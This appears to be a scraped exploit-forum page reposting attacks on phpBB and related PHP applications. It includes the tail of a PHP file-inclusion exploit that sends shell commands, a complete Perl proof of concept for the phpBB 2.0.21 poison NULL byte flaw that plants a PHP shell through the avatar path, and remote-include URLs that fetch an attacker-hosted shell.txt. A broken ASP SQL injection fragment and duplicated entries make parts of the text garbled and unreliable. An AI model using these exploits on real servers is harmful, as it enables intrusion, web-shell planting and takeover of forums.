if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); } } if ($proxy=='') {$p='http://'.$host.':'.$port;} $packet ="GET ".$p."admin/modules_data.php?phpbb_root_path=".$shell."?cmd=".$cmd."%00 HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpackets($packet); if (strstr($html,"hauru")) { $temp=explode("hauru",$html); die($temp[1]); } echo "Exploit err0r :("; echo "Go to DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam"; ?>
# milw0rm.com [2006-10-30]
tonyan(HCE) phpBB <= 2.0.21 (Poison NULL Byte) Remote Exploit
Xploit: Code:
#!/usr/bin/perl -w
# Author: ShAnKaR
# Title: multiple PHP application poison NULL byte vulnerability
# Applications: phpBB 2.0.21, punBB 1.2.12
# Threat Level: Critical
# Original advisory (in Russian): http://www.security.nnov.ru/Odocument221.html
#
# The poison NULL byte vulnerability for Perl CGI applications was described
# in [1]. ShAnKaR noted that the same vulnerability also affects a number of
# PHP applications; phpBB and punBB are two examples.
#
# The vulnerability can be used to upload or replace arbitrary files on the
# server, e.g. PHP scripts, by appending a "poison NULL" byte (%00) to a
# filename: the application treats the whole string as the name, but the
# C-level filesystem call that finally receives it stops at the NUL, so
# anything the application appends after it (a generated file name, an image
# extension) is silently ignored.
#
# In the case of phpBB and punBB, the vulnerability is exploited by changing
# the avatar file location to an attacker-chosen path terminated with %00 and
# then uploading an avatar image that carries PHP code in its EXIF data.
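#
# A PoC exploit to change the avatar file location for phpBB.
#
# Usage: ./phpbb.pl localhost.com/forum/ admin pass images/avatars/shell.php [d]
#
# Flow: log in as a normal user, pull the session id (sid) out of the login
# page, re-authenticate into the admin control panel (admin=1), then POST
# admin_board.php with avatar_path set to the requested path plus a trailing
# %00. The NUL is the payload: phpBB keeps the full string, but the underlying
# filesystem call stops at the NUL, so the avatar upload is written to exactly
# that path. The supplied account must therefore have board-admin rights.
#
# NOTE(review): the raw %00 only works if the target does not escape NUL bytes
# in request data (e.g. magic_quotes_gpc rewriting it to \0) - confirm against
# the target's PHP configuration before relying on this.
#
use HTTP::Cookies;
use LWP;
use URI::Escape;

unless (@ARGV) {
    die "USE:\n./phpbb.pl localhost.com/forum/ admin pass images/avatars/shell.php [d(DEBUG)]\n";
}

my ($forum, $user, $pass, $avatar_path, $debug) = @ARGV;
my $base = 'http://' . $forum;

my $ua = LWP::UserAgent->new(agent => 'Mozilla/4.0 (compatible; Windows 5.1)');
$ua->cookie_jar(HTTP::Cookies->new());

# Form-encode every user-supplied field so that '&', '=', '%' or '+' in a
# username or password cannot split or corrupt the POST body. URI::Escape was
# imported by the original script but never actually used.
my $login_body = 'username=' . uri_escape($user)
               . '&password=' . uri_escape($pass)
               . '&login=1';

# POST a form-encoded body to $url and return the response object.
# Shared by the three requests below.
sub post_form {
    my ($url, $body) = @_;
    my $req = HTTP::Request->new('POST', $url);
    $req->content_type('application/x-www-form-urlencoded');
    $req->content($body);
    return $ua->request($req);
}

# 1. Ordinary login - populates the cookie jar.
post_form("$base/login.php", $login_body);

# 2. The login page now contains a link of the form ...true&sid=<sid>"; that
#    sid has to be carried on every admin URL.
my $res     = $ua->get("$base/login.php");
my $content = $res->content;
my ($sid)   = $content =~ m/true&sid=([^"]+)"/;
print $content if $debug;
# Stop here rather than continuing with an empty sid: the original relied on
# a bare $1 and would have sent an unauthenticated admin request (plus an
# "uninitialized value" warning under -w) when the login failed.
die "login failed or no sid found in login page (bad credentials / forum path?)\n"
    unless defined $sid;

# 3. Re-authenticate into the admin panel.
post_form("$base/login.php", $login_body . '&admin=1');

# 4. Set the avatar path. The %00 is appended raw, not through uri_escape,
#    because the NUL byte itself is the payload.
my $payload = 'submit=submit&allow_avatar_local=1&avatar_path='
            . uri_escape($avatar_path) . '%00';
$res = post_form("$base/admin/admin_board.php?sid=$sid", $payload);
print $res->content if $debug;

black_hat_cr(HCE) phpBB XS <= 0.58 (functions.php) Remote File Include Vulnerability PHP Code: Vulnerable File: includes/functions.php Vulnerable Code: //The phpbb_root_path isn't initialised include_once( $phpbb_root_path . './includes/functions_categories_hierarchy. ' . $phpEx ); Method To Use: http://www.victim.com/[phpbb_xs]/includes/functions.php?phpbb_root_path=http://yourdomain.com/shell.txt? (the trailing ? turns the rest of the include path, ./includes/functions_categories_hierarchy.php, into a query string on the attacker's URL, so shell.txt itself is fetched and executed; this needs a target PHP that permits URL includes - allow_url_fopen / allow_url_include)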
Xfile.hacker(HCE) HPBB2 PlusXL 2.72 Functions.PHP Remote File Include Vulnerability @http://www.example.com/includes/functions.php?phpbb_root_path="www.exam ple2.com" Black_hat_cr(HCE) PHPEasyData Pro 2.2.2 Remote SQL Injection Exploit PHPEasyData Pro 2.2.2 (index.php) Remote SQL Injection Exploit PHP Code: <% Response.Buffer = True %> <% On Error Resume Next %> <% Server.ScriptTimeout = 100 %> <% '========================================================== ===================================== '[Script Name: PHPEasyData Pro 2.2.2 (index.php) Remote SQL Injection Exploit '[Coded by : ajann '[Author : ajann '[Contact : :( '[ExploitName: exploit3.asp '[Note : exploit file name =>exploit3.asp '[Note : If Wrong Id = "CTYPE html PUBLIC see" '[Using : Write Target and ID after Submit Click '========================================================== ===================================== %> <% function guvenlik(username) guvenlik = Replace(username,"<sup>(37)</sup></span></span></span></span></ span></a>","") guvenlik = Replace(guvenlik,"(37)","") guvenlik = Replace(guvenlik,">","") End Function %> <html> <title>PHPEasyData Pro 2.2.2 (index.php) Remote SQL Injection Exploit</title> <head> <script language="JavaScript"> function functionControl1(){ setTimeout("functionControl2()",2000); } function functionControl2(){ if(document.form1.field1.value==""){ alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again"); } } function writetext() { if(document.form1.field1.value==""){ document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size =\"1\" color=\"#008000\">There is a problem The Data Didn\'t Take </font>' } } function write(){ setTimeout("writetext()",1000); } </script> </head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1254"> <body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000 . http://www.victim.com/[phpbb_xs]/includes/functions.php?phpbb_root_path =http://yourdomain.com/shell.txt? 
Xfile.hacker(HCE) phpBB2 PlusXL 2.72 functions.php Remote File Include Vulnerability: http://www.example.com/includes/functions.php?phpbb_root_path=http://www.example2.com/ - note that the value must be a full URL with a scheme; a bare host name such as "www.example2.com" is resolved by PHP as a relative local path, not fetched remotely. Either host the file that phpBB appends to the root path on the attacker's server, or end the attacker URL with ? so the remainder of the include path becomes a harmless query string (as in the phpBB XS entry above). Remote includes only work where the target's PHP configuration permits URL includes (allow_url_fopen / allow_url_include).